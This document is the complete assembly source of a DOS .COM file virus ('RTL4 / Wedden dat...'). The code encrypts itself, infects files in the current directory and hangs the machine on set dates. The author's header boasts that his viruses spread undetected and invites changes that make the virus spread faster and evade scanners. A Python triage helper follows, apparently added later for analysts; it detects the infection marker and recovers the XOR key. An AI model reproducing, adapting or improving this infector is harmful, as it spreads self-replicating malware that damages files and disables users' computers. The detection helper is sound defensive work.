2022-08-21 09:07:57 +00:00
;******************************************************************************
;
; RTL4 / WEDDEN DAT... VIRUS
;
;******************************************************************************
;
; "If a weaking linkage found, eliminate...
; Hear the cities fearful roar!"
;
; Now in front of you lies another source of a virus. It is not a very good
; one, but, as you might say, a virus is a virus. After my wake at the PC, I
; created several viruses, like:
;
; Deicide / Glenn
; Morgoth
; Breeze
; Brother
; Commentator I
; Commentator II
; Spawnie
; Xmas
; 1St_Star / 222
; T-1000
;
; Well, I bet you think this is a whole lot, but some are minor variants, for
; which I don't have the guts to publish the source code. I have to admit,
; Deicide and Morgoth have spread very well. I uploaded them to a BBS and it
; was downloaded several times, and it is not detected by antivirus programs yet.
; Deicide is now detectable, but that was my first attempt to make a virus.
;
; This virus is a Non-Resident Direct Action .COM Infector.
; It only infects files in the current directory.
; You can recognize an infected file simply: the 4th byte is a '*' (just like
; the 1St_Star virus). It is inactive from January till May and starts
; replicating from May. After July, every Wednesday after the 21st the
; program will hang the system, showing the address of RTL4 Joop v/d Ende
; Productions.
;
; Disclaimer : This program is like all other virus sources only for
; educational purposes and should not be given to irresponsible hands
; (John McAfee and people like him).
;
; For the criminal reader : Don't just change the text of this virus and
; say you made a virus. Instead use some ideas from this virus and create your
; own virus if you want to be nasty. Additions to this virus that make it
; spread faster and make it harder to detect are welcome, as long as I get
; the new source code.
;
; I want to thank several virus writers for their support with letting McAfee
; and Ass. earn his money with making so many updates of SCAN...
; Here they are : Bit Addict, XSTC, Dark Helmet, Dark Avenger, Nuke!, Cracker
; Jack and many more creators.
;
; Note to XSTC : Thank you for disassembling the Deicide virus, for I have lost
; the source code. Next time write a message, because I might have the source
; code of the virus ready, but not uploaded. It saves you time, so you may
; disassemble another virus (of course only for educational purposes ;-) )
;
; Now have fun with this virus, written in A86 assembler version 3.22
;
; Glenn Benton
;
; "Is it truly a disembodied head lurking in the dark of the tombs of fate?"
;
Org 0h ; The outcome will be .BIN
Start: Jmp MainVir ; Jump to main virus
Db '*' ; signature
MainVir: Call On1 ; Get virus offset
On1: Pop BP ; BP is the index register
Sub BP , Offset MainVir + 3 ; Calculate virus offset
Push Ax ; And store AX (error reg.)
Lea Si , Crypt [ BP ] ; Decryptor for the
Mov Di , Si ; virus code. It's long
Mov Cx , CryptLen ; for a decoder, but it
Decrypt: Lodsb ; reduces the recognizable
Xor Al , 0 ; part enough.
Stosb ;
Loop Decrypt ;
DecrLen Equ $ - MainVir ; Decryptor length
Crypt: Mov Ax , Cs : OrgPrg [ BP ] ; Store the 4 first bytes
Mov Bx , Cs : OrgPrg [ BP ] + 2 ; of the host
Mov Cs : Start + 100h , Ax ;
Mov Cs : Start [ 2 ] + 100h , Bx ;
Mov Ah , 2ah ; Get date
Int 21h ; If it is a Wednesday
Cmp Dh , 8 ; after July and after
Jb NoMsg ; the 21st, execution
Cmp Dl , 22 ; continues here, else
Jb NoMsg ; it goes to NoMsg
Cmp Al , 3 ;
Jne NoMsg ;
Mov Ah , 9 ; Display the message
Lea Dx , Msg [ BP ] ;
Int 21h ;
Lockout: Cli ; And lock the computer
Jmp Lockout ;
NoMsg: Cmp Dh , 5 ; Is it after April?
Jae DoVirus ; Yes - Replicate
Jmp Ready ; No - Terminate to host
DoVirus: Mov Ah , 1ah ; Move DTA to a safe place
Mov Dx , 0fc00h ; DTA at 0FC00h
Int 21h
Mov Ah , 4eh ;
Search: Lea Dx , FileSpec [ BP ] ; Search for a .COM file in
Xor Cx , Cx ; the current directory
Int 21h ;
Jnc Found ; If not exist, goto Ready
Jmp Ready ; else goto Found
Found: Mov Ax , 4300h ; Get file attributes
Mov Dx , 0fc1eh ; and store them on the stack
Int 21h ;
Push Cx ;
Mov Ax , 4301h ; Wipe the attributes, so it
Xor Cx , Cx ; is accessible for us
Int 21h ;
Mov Ax , 3d02h ; Open the file with
Int 21h ; read/write priority
Mov Bx , 5700h ; Get the file date/time stamp
Xchg Ax , Bx ; and store them on the stack
Int 21h ;
Push Cx ;
Push Dx ;
Mov Ah , 3fh ; Read the first 4 bytes
Lea Dx , OrgPrg [ BP ] ; of the program
Mov Cx , 4 ;
Int 21h ;
Mov Ax , Cs :[ OrgPrg ][ BP ] ; Is it a weird EXE?
Cmp Ax , 'MZ' ; Yes goto ExeFile
Je ExeFile ;
Cmp Ax , 'ZM' ; Is it a normal EXE?
Je ExeFile ; Yes, goto ExeFile
Mov Ah , Cs :[ OrgPrg + 3 ][ BP ] ; Is it already infected?
Cmp Ah , '*' ; No, goto Infect
Jne Infect ;
ExeFile: Call Close ; Call File close
Mov Ah , 4fh ; Jump to the search routine
Jmp Search ; again for a .COM file
FSeek: Xor Cx , Cx ; Subroutine for jumping to
Xor Dx , Dx ; the begin/end of file
Int 21h ;
Ret ;
Infect: Mov Ax , 4202h ; Jump to EOF
Call FSeek ;
Sub Ax , 3 ; Calculate new virus offset
Mov Cs : CallPtr [ BP ] + 1 , Ax ;
Mov Ah , 2ch ; Get system time
Int 21h ;
Mov Cs : Decrypt + 2 [ BP ], Dl ; Move the decryptor part
Lea Si , MainVir [ BP ] ; with the hundredths of a second put
Mov Di , 0fd00h ; into the XOR command to
Mov Cx , DecrLen ; the end of the 64K segment
Rep Movsb ;
Lea Si , Crypt [ BP ] ; Encrypt the virus with
Mov Cx , CryptLen ; the hundredths of a second.
Encrypt: Lodsb ; Merge it behind the
Xor Al , Dl ; decryptor
Stosb ;
Loop Encrypt ;
Mov Ah , 40h ; Write the virus
Lea Dx , 0fd00h ; at the end of the
Mov Cx , VirLen ; file
Int 21h ;
Mov Ax , 4200h ; Move to start of
Call FSeek ; the file
Mov Ah , 40h ; Write the jump to the virus
Lea Dx , CallPtr [ BP ] ; at the begin of the file
Mov Cx , 4 ;
Int 21h ;
Call Close ; Close the file
Ready: Mov Ah , 1ah ; Restore the DTA to the
Mov Dx , 80h ; original offset
Int 21h ;
Pop Ax ; Get (possible) error code
Mov Bx , 100h ; Strange jump (but nice) to
Push Cs ; the begin of the program
Push Bx ; (which has been restored)
Retf ;
Close: Pop Si ; A pop which is stupid
Pop Dx ; Restore files date/time
Pop Cx ; stamp
Mov Ax , 5701h ;
Int 21h ;
Mov Ah , 3eh ; Close file
Int 21h ;
Mov Ax , 4301h ; Restore attributes
Pop Cx ;
Mov Dx , 0fc1eh ;
Int 21h ;
Push Si ; A push which is stupid
Ret ; Return to caller
CallPtr Db 0e9h , 0 , 0 ; Jump
FileSpec Db '*.COM' , 0 ; Filesearch spec & signature
; Activation message
Msg Db 13 , 10 , 9 , 9 , 'RTL4'
Db 13 , 10 , 'Joop van den Ende Produkties BV'
Db 13 , 10 , 'Marco Daas (Casting Assistent)'
Db 13 , 10 , 'Postbus 397'
Db 13 , 10 , '1430 AJ AALSMEER'
Db 13 , 10 , 'van Cleeffkade 15'
Db 13 , 10 , '1413 BA AALSMEER'
Db 13 , 10 , 'The Netherlands'
Db 13 , 10 , 10 , 'Wedden dat... je een virus hebt?'
Db 13 , 10 , '$'
; First 4 bytes of the host program
OrgPrg: Int 20h
DB 'GB' ; My initials (Glenn Benton)
CryptLen Equ $ - Crypt ; Length of encrypted part
VirLen Equ $ - MainVir ; Length of virus
;
; Sleep well, sleep in hell...
;
; > and Remember Don't Forget to Call <
; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <
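The header states how an infected file can be recognised (a near jump at offset 0 and a '*' as the 4th byte), the code shows the two date windows (replication from May, the lock-up payload on Wednesdays after the 21st from August onward) and a one-byte XOR layer whose key is the hundredths-of-a-second value from Int 21h/2Ch. The following triage helper is an added example written for an analyst or incident responder; it is not part of the original listing. It checks the marker, locates the appended region from the jump displacement (the infector writes EOF - 3 as the rel16), and recovers the XOR key by trying the 0..99 range against the known message text "RTL4" from the listing. The sample file built by `build_sample` is constructed for the test: a dummy host and a NOP stub stand in for real code, only the marker bytes, the jump displacement and the XOR-encoded message follow the layout described on the page.

```python
"""Triage helper for the infection marker, trigger dates and XOR layer
described in the listing above.  Added example, not part of the original
source.  All bytes built here are constructed stand-ins, not real samples."""
from datetime import date

# DOS Int 21h/2Ah returns AL = weekday with 0 = Sunday; Python's weekday()
# uses 0 = Monday, so the value is shifted by one before comparing with 3.
DOS_WEDNESDAY = 3

MARKER = b"*"                 # 4th byte of an infected .COM (header, Db '*')
KNOWN_PLAINTEXT = b"RTL4"     # first text of the activation message in Msg


def classify_trigger(year: int, month: int, day: int) -> str:
    """Mirror the listing's checks: payload needs month >= 8 (Cmp Dh, 8),
    day >= 22 (Cmp Dl, 22) and a Wednesday (Cmp Al, 3); otherwise month >= 5
    (Cmp Dh, 5) replicates; anything earlier only passes control to the host."""
    d = date(year, month, day)
    dos_weekday = (d.weekday() + 1) % 7
    if d.month >= 8 and d.day >= 22 and dos_weekday == DOS_WEDNESDAY:
        return "payload"      # message shown, then Cli / Jmp Lockout
    if d.month >= 5:
        return "replicate"
    return "dormant"


def marker_present(data: bytes) -> bool:
    """Infected .COM: near JMP (E9 rel16) at offset 0 and '*' at offset 3."""
    return len(data) >= 4 and data[0] == 0xE9 and data[3:4] == MARKER


def appended_region(data: bytes):
    """The infector stores original length - 3 as rel16, so the jump lands at
    the old end of file where the appended code starts.  Returns (start, body)
    or None when the displacement points outside the file."""
    rel = int.from_bytes(data[1:3], "little")
    start = rel + 3
    if start >= len(data):
        return None
    return start, data[start:]


def recover_xor_key(body: bytes, plaintext: bytes = KNOWN_PLAINTEXT):
    """Single-byte XOR with a key taken from hundredths of a second (0..99):
    try every candidate and look for the known message text.  Returns
    (key, decoded) or None."""
    for key in range(100):
        decoded = bytes(b ^ key for b in body)
        if plaintext in decoded:
            return key, decoded
    return None


def triage(data: bytes) -> dict:
    """Combine the checks into one verdict for a file image."""
    result = {"marker": marker_present(data), "key": None, "message_found": False}
    if not result["marker"]:
        return result
    region = appended_region(data)
    if region is None:
        return result
    _, body = region
    hit = recover_xor_key(body)
    if hit is not None:
        result["key"] = hit[0]
        result["message_found"] = True
    return result


def build_sample(key: int) -> bytes:
    """Constructed stand-in for an infected .COM: a 16-byte dummy host, a
    20-byte NOP stub (not a decryptor) and an XOR-encoded copy of the message.
    The first 4 host bytes are overwritten the way the infector does it:
    E9, rel16 = original length - 3, '*'."""
    host = bytes([0xCD, 0x20, 0x47, 0x42]) + b"\x90" * 12   # Int 20h, 'GB', NOPs
    original_len = len(host)
    stub = b"\x90" * 20
    message = b"RTL4\r\nWedden dat... je een virus hebt?$"
    encoded = bytes(b ^ key for b in message)
    patched_head = b"\xE9" + (original_len - 3).to_bytes(2, "little") + MARKER
    return patched_head + host[4:] + stub + encoded


if __name__ == "__main__":
    sample = build_sample(37)
    print(triage(sample))
    for ymd in ((2022, 3, 2), (2022, 5, 1), (2022, 8, 17), (2022, 8, 24)):
        print(ymd, classify_trigger(*ymd))
```

Because the key space is only 100 values and the message text is fixed, known-plaintext recovery is cheaper and more reliable than parsing the decryptor's opcodes, and it also gives the responder the decoded body to compare against the listing. The date classifier is handy when reconstructing why a machine hung on a given day: only a Wednesday on or after the 22nd of a month from August onward reaches the lock-up loop.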